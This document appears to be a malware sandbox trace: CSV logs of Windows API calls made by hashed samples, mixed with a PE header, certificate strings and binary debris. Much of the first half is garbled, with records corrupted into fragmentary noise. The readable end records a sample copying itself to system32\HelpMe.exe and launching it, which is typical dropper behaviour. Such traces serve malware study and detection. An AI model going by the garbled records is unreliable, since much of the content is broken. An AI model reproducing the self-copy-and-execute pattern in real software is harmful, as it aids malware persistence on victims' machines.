|obmnOutBu677!
<,2ug0x00000008","lpBytesReturne>vbm&0120f884","lpOve-
apped->0x00000000"
.22748
4(9K!!
beb:76d8T}uE69bj2fc4
s&F0bfmd4
2d6bdca8180fb
ea7=4d
,"1768","fildqystem"/&Create>
Q2)"0x
e(lGillNamd
A/\MfuntQ
.*jLanhgeR","dwDesired@
+!lr->HTTrIBUTES"
"200;0111211526.399
:(ffe6W
y$!8bc;fc56
+ &cfdm442e
*iz`8110f`3
%5|`74=d"/#
gx##,"demOpy","Virtual@
<!yDx"%"SuACESS","0x00047400","tm52Pro
nu(>He
j,`@dd{ess,
y8!116=000#
jidRizl->54
t;0-"feAlon
1:|nnTppe
<0x00001000"-
6"Dsotlct
<0x00000004"
!6019011441212
du3cebg
}Mi3fc<74
&Ioe44;d6
<90fj24
85d"%"1
qp,gillsySuem","ReadFim
qp-RUCJESs#,"","hFile-?2{400005ec","nN
rv536.:99"-
rs19",+9dd7
*'ad6clb347L+ 30d70bc1g
ds=cd1kffD642dybdca8181
2v<c8dh76
f","~768","fhnfwysqcm","Writy
Dyie->L
fe"oNudbe
0udsTfWr
~d40449"
*#201901112120
et089"%"1
58","9dd688cgg6ceb375`9d51d7
ft142d
3(1N*v4c8dh74
ef0668+,"
? {rted",
SeadFile","ST
PR",+",
iFile->0x000120cc","mJumberOB
4!140"a
212?.3y8
748+,"yeL6
cfe?ce"2
d51m79"b0eg574bd1bf
2va24b
8",+fi
em"%"W
le"%"SuCCESS","","hG
>0x900
0130","nNumbdpOfBytepPoWrite
; 4112	
748+,"
cfe?ce
d51m70
c2fc57
bd1bfe
d6bmca
080fc24b8da75
"17?8(
"fil-s
stem"-
dFiee 
"SUCmESS",""- kFmie->0~00000L
Pudd->
01182120
99"%"175
9dd?8:Cge6c?b376d9d4
bc2oc7
5bd18fdd442d7`dcb<180fc24b8dq
 vlles!
.2VZ 0
Fill","Re
SS"%"",#
e->9x2
1001i0","nNul
fBy}eqtnWri.e->61441 
!60190111212
 <'9dd
d9d<1d
c57=bd
42d?bdCa8180fc24b8d`
","876
","filesystel ,"ReadEmle","S
k|`->08
Numker
sTo[ea
112828
6.399"
"1748#
d681cfE7ceb376d9d51e
2fc<74Be1bfdd442d6be
80fj2>B8da7|4
","177
fills{Stem"
"WriteFhnf&)$SUCCB[S","
MvGyte{
112821
","874
d681cf
76d0d5
e79bc2fc574be
d44;d6Beca8180fc24b9
4d"%"1
68","filesysu
"RehdFIle","SUCCESS#
"hF`lg
>0x0u0000cc"-
mbe{Odbytes
oRead->73700"
%:9;9011u
;t01d7=
7'5J-u
fdd=42
8189fc
744m",
,"f`le
","^riTdFile","SUCCD
"",+hFIme->0x0000012
nNudbeROfBytesToWriu
*"201901112120
99"%"3
48",g9dd688cg
b37?d;D51d7|bc2fc575`g5bfab3<;n6bdc)
.2WeadN
","gNUmc
BytlstoS
79bj2Fc4Ww"
da7=4D"-Brw
8",+fIld
em"%"wrh
le"%"sUB#
,"nGuMbd
ytezTOWs	7%
8;cfeN
4t9d51d79bc2fc454bd1bfdd442d6bgga8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->44<18"
%201108;12:212:.>99""">'483,"9vd%88cre#ueb3 6d9|51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","
8",+9d$7X8I
e6clb3w7f9d51d79bc2
f!`fdd
fc25b8%`?4
","076y#$"A
lesxst$l*,
ritdFi-d*,>
UCCFSS
hFioe-~1p0
001:0"l#
berGfB9u
Wri|e-~3F8"
"2819p0A12
212>.3y8*,"
748*,"yel68
cfe>ce"2?6d
d51l79bb:fc
74bl1bfe
d6bmcax0@0f
24b0daw5Ld
"17>8"l#
sys|emb-ZWr
teFaleb-ZSU
CES[",b#T"R
ile%>081H
130*,".O}mb
rOfByt-r\oW
ite->2~9 
'266988;:212=?6.399""-1748",2(vw"-.tfe6ceb376d9d51d79bc2fc57,{d1bfdd442d"
0!392'
399#,"q6<82
"9de68xbne&
eb366dye=1t
9bc;fcu6<bt
bfde44re>bt
a8190f#36a<ag744d",
mfgFil!
fzux-W",#SUCBMCX},""-"lpDcis
ingNileOimeL>C:TAUTN^XE!.BA\.exd*,"
FildFam
->C2\AUUAEX C.BIT"
B20W9011121392'I399#,"16<%,
"9dm68
bn{8Ieb3>6d
9bc;fc
bfdm44
a8100fc3<b8
a74<d",#976R","nilerqst
m",*Cre`oeF
STXCE>S",*0
01800_30"%"lpGv}n!ame$>C
Run'ex
Des`re
s->NEN
SVRT!EAD+
3/ 2D111;12
3)?8L9",+17
9==)Odd618c
376m9d
c2fj57
dd4=2d
c{rjB180oc2
c'ujL44d+,"
6)))P"fiees
rktf_,"Rlad
hst)R"SUJCE
:,"hNile,30Q)0008130#!"GTumbmrOfCttLhToRmad-??6
":0191<1
/121:6.384"
<1740","8id
'8cfm6cec>7
D9d59d79cn2OB574jd1bgid
2d6jdca9<8
Ec24j8da694M
,"1?68"-/f@Iesy{tem#!"jTeatmFildZ"
SUCKESS#$"?
000901
pFieeN
:\A\TO
F",+dw
dAcjes
ERIJ_R
"20890
126'39
48"%"9
fe6jeb
51d>9b
4bd8bf
6bdja8
4b8ma7
1761",
ystlm"
#ZeAfFilm*,#R]CcFSS"$*"
e->8x0018; 
0",+nN
ljeRMfBy|usUnZeAg->2>("
9019121399'
399;,"
6<))9"9dm68
eb3.6d
9bc+fc
bfdm441e>iu
a81!0f
a74=d"/#9
","oilfrq|
m",+Cr
leW+,"
TMCE6S",*0x018;!
30"5"l
ame$>C:]1ko
88coe6
d9d<1d
c57-bd
42d/bd
fc2=b8
","lwD
Acclsq
>GENDRIC_REAE*
201003
26.399"-*:&
8",+9f
688cge6ceb377l2u
1d70ba
bd1bfdd561`6gbdi1120mo?:m(us$ !r","176/:58}ilesenjzM
gWCF\LFCGe{","SUnmjcb
AS)*>4 :7*$29=Xvv_LO
stem"D
Mz pH;)
xumD2h
I2 hI2(
2!&C <^
<  E2$
c#@V.2
F;sWJ:2
xuAN2h$@2 
_3 FC ||-{d
2!f]d(
r_:	p|
Y3!u[3"
^ftr_:s
a"7b8d)
.20??7#,"rtgi
uzr3-"RevCr
`|jBdyExF",
R]RHDSS"="0
1124","
?HKEY_C
SZEnV_USEV
,#dpsvbKey)
nn}xere\\ic
n{dwp\Wi
rTL|vreneVe
ra~eXExp}or
sTLNqntPoin
r:_Xe20cd69
9810"=06d'17
71=wx\"
01?84121#12
/;(2',"1&48
-*8Ea688cfe
26d9d51
61bC0fc575
d0jfDg442d7
bi1>>0fc#4b
ei<%2d",317
9*#+tegibtr
#$3YcgSeeVa
tmDYQ","SUC
*"","hK
z00002
opValw
`el"9BastCl
r{)=%dwThpe
?9-%%lpDpta
?Lcbqe",3cb
6112121
7&391","17
8#$+6md68)cf
7kns:76d(d5
e?6kj2fc$74
e9smmd44#d6
880fc24
=4d","1
70",(regis
rx*%-YegOaen
dqNi\","BUC
D[\+'"0x!00
19#?),"hZey
?@JdR_CURRE
UWVpNR","lp
tjKeu->Sof
w`zlS@icrnsofuT\xcdowr\CuszjgyVerrion]Mi{aores\Motfuqbints2\CQK_ublume"
#:01701112
<99","
29dd68
gm6Ugb376d9e49d
:bc2fc5
5jd1sfdd4
d7jdcs8180
or744e"
"0?<(6,"rdgiruzy!."RegOpdoCe|GxW",
STBK~kE","Px0018
	%c",FhKex%	
o000P0125*
Key,3{I*0cd692,9h4
411e1-9884-
*6d617278;fUG"
"2008=1
-212126/249
1"1748"-#4dL(88cfe6bdo3
)d9d51d68oc
Fc574bd0ckdL
42d6bdb`51
fc24b8e`:4
G","1769#!"ZAgistry#-/RMBQueryV`mxem^W","SUBBHS{
,"","hJdq$1
x0010012k)=
lpV`lueOidj
12136.
1749",
8cfd6c
c;&=N9d50d7
ck-zI574cd1
2d6cdc
99(/Lc24c8d
,"1768
-*POZtem","
niGz@braryA
-*pcjCESS",
c0000"
#dSp@leName
?[kseL32.dl
019011
d790cfQ6ceb
77e1d5
d79bc2fb=74Td1bfdd45:U
Hdca818
H8da744
68","s
,"Load
hjEYEyA"L"S
BKrkd","Tx7
0",BlpFhd]yYme-Zolf2:/EDl"
"20013
1212126/;
,"1W48"-*
fe5bmU
51d61U@
fc5S4bg0jG\_442
0fcV4b;ei6
d","17
Xegistr
#&"PYgOpenKdxOxW
,"SUCCDR[
>ICM_`CLASSER^ZOO
","lpStcAe{l>Dir
cwnxy"L
930?12s2126.398,,#r748","9ej68|cfe6c
b2=6d|d51d
9ab:fbs74bd1
fel45ud6bdc
8000f+24b8d
e"176:",#
eO#stry
,"Shgg;enKe
rhKey->
`013e",
mxrt3Key->Cus^Ass
"2019181
`12126.285"
q1748",#8hd
l8cfe6
79d51d78ck	G3574bd1
d2d6bdc
7c24b8da6<
_s,"1768"-,re2istry",#Zeg
penKeyEy_",uSUCCESS#$"0 00000127*,"1Key->0x1800j13e","lq[ub
ey->(numd)"Q
"201900912l2126.398*=)$748#, 
dd68;cfe6ceb2?'o,d51e7;
c2fc074bd1bfel44
d6bdc`<180fc2
da75<d"
"1768#("regisDrH","Shgg=enKe9D|W","FA
RE"- !('nLmp'5DFKVO]]PUYIZYZRRRX<3
MRpQGme^
yDJYwO]Um
ZWrZEX^MfliRYQH3
667#)<
/9?$!!
=?=6?2+
CPSU\VVYXXZ^\\Y^BKJVYTFOMBYP_G
puL,ksR
0 MY2!
2!mP3!
fft2g:s.
j0t~<fs
w bQ>kct%{2DwPu
wuj(Tq
,#mr <
f%u.5)n)0v`574
f$5:n&vdca9180gky9
;da644g","1768","refast
y","RegP}er
UalueExW","k
BSESS"
cz@	/:
pCDTpq4
-2lpVaBJ$
"20190
0"7.39/","3748 ,"9gd68:cfe2ceb+76d<d51i79be2fc<74bc1bfhd44:d6bhca8880fo24b2da734d"'"17>8",.reg
strt","DegO
enKgyExG","KAILDRE">"",0hKe{->HjEY_AOCAy_MAAHIN
","apSu!Key/>So6twace\M;cro~oft
Winiows
Curdent
ersbon\<olinies1ExpLore
>201K0118212726.%99"
"17>8",
9dd<88c
e6clb37
d9d#1d7
bc2kc57
bd1Kfdd
42d;bdc
8182fc2
b8dj744
","<768
,"rtgis
ry"."Re
OpeeKey]
W" "SUOCES[","
1 0001
&"lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Expl
3)1011212126.39)","1748","9dd688cfg6cec376d9d51d79bc2fc574bd1bfdd462d6`dca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000140","lpValueName->ForceActiveDesktopOn"
"20190111212126.399","1748","9dd68MZ
!This program cannot be run in DOS mode.
@.rsrc
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
   <0  <$  rsds
SetupResources.pdb
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assemanyp
m5ny=(u
mas-microsofti;N=
"Mman;f
]  <trustInfo xmlnrm
crosogt
om:asm.v
    <Nd
urity>
    !m<!eQu6s
equested
}tionLXw
l level5"asIo;o8eR"su
/@equestedExecuv9znge
 </requestedPqkv9
ecurity>
%ft~nun0
D9N5X7P&D6I+G#A7DzNuXXPADDINGPADDINGXZ
I]F@A,DIN
PADDINGPADDINGXZ
f=7\6E6u6
9$:(:':n;
<O=6=9=
9!:5:M:q
;P;T;X;T;`;
3.4X4XdH5
3n4q4{4g4
4}4q4U4O4[4I4U4Z4
4P4)4-4<484)4"4
4C5H5?5&595
7_:Z:Q:P:,:!:f:L:P:U:
1O2\2^2/2$2l2
3n363Z3
3'4Y4ad
4\464~4v4x4
7W767X7
8m9'9!9=9
9O:>:F;@;F;
5]6&6m626
7c7C7W7
7e8W8S8;8
8k9c949E9
:l;<;P;!;
=&>(>M>X>g>
232Q2H2>2(2
5"6d6w6j6A626{6
z0G0 0/0
0!1y1E1B1=1
5G5V5f5
7.8c8k8Q8+8
91:`;];
<6<:<<<><D<^=
;q<q<6<
>1>?>E>k?
7!8L8m8wh
2y3;3<2N2$2
2$3X3z3|3L3K3
3r3R3!3r3i3`3f3p3y3
4&4+4<4D4J4Vdy4b4F5j4
4i5q5j7g7.7H7
797;8o8x8
;H;[;8;
=@>H>`>
606S6v6
7C8B8;8
9&9I9l9
j:^;K;&;
;l<-<M<m<
>i?(?C?j?
202P2k2
4 5"5#5
5t5K5%5>505
6]6X6,6'6!6
6e7s7I7T7\7]7d7q7R7l7y7q7
7f8b8i8W8T8K858,8(8
8P9_9\979?909x9
9`:o:y:V:H:D:
:+:8:8:3:
:w;};c;x;F;_;
;U;);:;0;
<I<G<Q<+<w<w<p<D<$<
<r=u=v=M=J=[=H=+=1=w=
=i>->z>K>E>J>S>m>j>}>l>T>~>s>
>F?K?]?{?
k0D0J0
0?1Q1B1P1(1
1b2c2s2R2j2:272@2
2z3O3D3X3U3|3
4G4p4$4>4
4u52545%5"5W5
5L6=6*6!6+6
6L7#7.7<717
:!;#;=;0;
=I=D=T=
|0p0E0F0>08000H0
2$3p3p3C3
4A4!4u474
8d8o8o8f8
:w;M;E;
;};u;+;`<%<=<.<
=L>E>E>R>
>v>'>H?
3r4~4K4A4%4
9F9n9<:u:`:|:K:
;6<b<@=@=I=n=1=
=w>h>M>
2}2E2*3
6,7-7%7
7x8m8'878
=u=z=L=(='=
=s>+>;>9>.>
>F?=?0?)?
3|4:404
5U6R6H656;606
6c7c7e73737
7^7W7Y7
788'8!8
8E9N9@9=96959
9d:c:}:`:":%:P:
:8: ;l;
;I;C;H;
<g<Z<V<
<~=7=l=!=4=?=
=i>k>m>
>I?T?I?>?w?/?
~0b0o0`0"0%0P0
0 1"1>1
1:161O1B1]1
2z2?2>2(2
2q3d3u3`3+393
y2}2s2y2N2J2M2G2Q2Z2Y2J2!2*2d2l2:2;232=2@2	2	2
2t3}3e3e3c3q3v323
3y3}3p3y3@3.3o
7}8v8r8[8V8 
5j6,6q6x6A6@6X6E60686
4y5w5|5
5<545s5s5H5P5M5I5^5
5y5d5<595<515=5|5
5j6e6(6
6e6{6j6u6T6P6I6M6
6A6M6X6%6(6$6e
4i5c5`5a5S5
5l6q6f6
6~7^7?7
8:8c8u8A8
9a:(:(:z:{:W:!:h:):
;1;8;$;
;|;8<h<
>5>6>o>a>y>
>p>y>x>
>t?k?Y?Y?U?.?
0.1$1-1?1#1
2d2W2U23202)2-2p2 21292
2 3\3_3T3W3
3R3T3U3\4
4 5n5i5,5t5u5l5}5T5M5M5H5_5G5L5S5*5!5&5l5 5;545)5
5J5L5U5o6U6i6b6C6U6E6O6\6
6p7a7Q7\7/777
9v:e:z:m:|:`:y:2:
:q:|:h:7:;:;:Z;F;
;i<p<q<g<c<q<v<<<K<E<A<G<Y<G<L<]<`<0<=<#<$< <=<5<
<	<@<P<
<r=n=i=y=c=`=q=y=@=G=
=F>B>U>@>L>I>n>d>i>c>
]0U0Y020/0#0)0:0
0r1m1|1m141h1
1r2}2I2J2M2B2
2U2O2%2
2w3<3L3G3G3
4C5M5^5K5U5
7C8Q8V8.8%8
9%:(:$:5:=:
;)<*<-<><t<
< =q===(=5=4=0=
>$>->+>
> ?+?-?(?4?w?y?Q?Y?a?
k0%000U0u0
0n1P1K1Z1Q1@1
2_2Q2W2
2<3)3$3
4'5?59595
5@6W6N6)626!6"6p65696
7v7<7$777	7
7m8<8K8
849)9'959 959
:0;4;<;@;
;Z<]<R<d<)<
<S=A=_=C=
>4>;>(>
>V?E?D?Y?@?
0>1=1+1/1
2{3|3b3w3o3
3e4g4w4H4N4
6^6Q6X6
6i7F7Q7H7
7d7=79707=7
7l8a8m8b8>848R8O8W8
9I:$:!:$: :5:=:2: ;j;
;g;i;b;q;u;J;
=^=Q=X=
=h>d>m>0>H>y>
o0O0L0B0I0\0Y0Y0`010
2.2	292P2z2
3A3n3(31343
3S4!4=4"454
4-5-5?5V5Z5
6.6I6f616(6
6l7h7i7u7
7r7;777
;X8p8.8/8
8G9Q9o9j979%9:9>9
:0:2:=:
Lp:~:};
>4<=<p<X<@<:<L<
=	=O=+=%= =5=
>:>?>'>
>Z?Q?@?	?
{0s0f0)08080
1 2z2i2K25262
3!3b3934393
4X4^4G4
4$5j5e5}5 5$5x5>5
5H6(6v6'6m696
6N7i7a7!7H7
7n8C8M8_8J8
8e9c9]9,9
:$:}:Q:_:
:r;t;S;2;);8;
=L=%=0=l=h=
=J>U>'>!>">
>I?0?k?Y?
t0t0p0H0P0
0}1o1d1V1}1
1h1p191
2F2"252,2\2
2o3s3R3C3,3N3y3y3
3v4A4Z4C4]4
6B6y6n6f6M6D6I6y6Z6^6S6@6D6l6H6P6
nXgEsL~Bp@vPsQy[oxgesl~bp`vpsqy{o
o8g%s,~>p$v
HHSLPPYTH\Y`
8h9xQ}
56#e ;;
o_@IFY_X4
|AR^^C^RE
y/@.r1)7
V:_id;w;:Y
h,Z<5"A;d
r>}:{<
*c-"19M
M hkU|
MOdR{HqNe
P?h9];
y<koq4t,p.
0!<!8(
=;;h8;S?
[c\0O02R
h1{bx=
Y>Wm\>O:5kU+X)j;%<|+ro
vyXfTkTzO
xCI@TFZLRSUp
3http://crl.microsoft.com/pki/crl/products/CSPCA.crl0H
,http://www.microsoft.com/pki/certs/CSPCA.crt0
0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority0
060916010447Z
190915070000Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Timestamping PCA0
ipfx'f
N+"\hE
flAllocationType->0x00001000","flProtect->0x00000040"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.216","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000008c","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->268"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000084","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->61440"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->43574"
"20190731003623.226","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000084","nNumberOfBytesToWrite->43574"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","synchronization","OpenMutexW","SUCCESS","0x00000098","dwDesiredAccess->0x00120001","lpName->ShimCacheMutex"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000a4","hKey->0x000000a8","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000a4","lpValueName->Cache"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x77dd0000","lpFileName->advapi32.dll"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","CreateProcessInternalW","SUCCESS","612","lpApplicationName->(null)","lpCommandLine->C:\WINDOWS\system32\HelpMe.exe"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","process","WinExec","SUCCESS","","lpCmdLine->C:\WINDOWS\system32\HelpMe.exe"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x0000008c","nNumberOfBytesToRead->268"
"20190731003623.236","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","FAILURE","","lpFileName->C:\DOCUME~1\JANETT~1\LOCALS~1\Temp\\
// Include file for object and counters definitions.
//","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
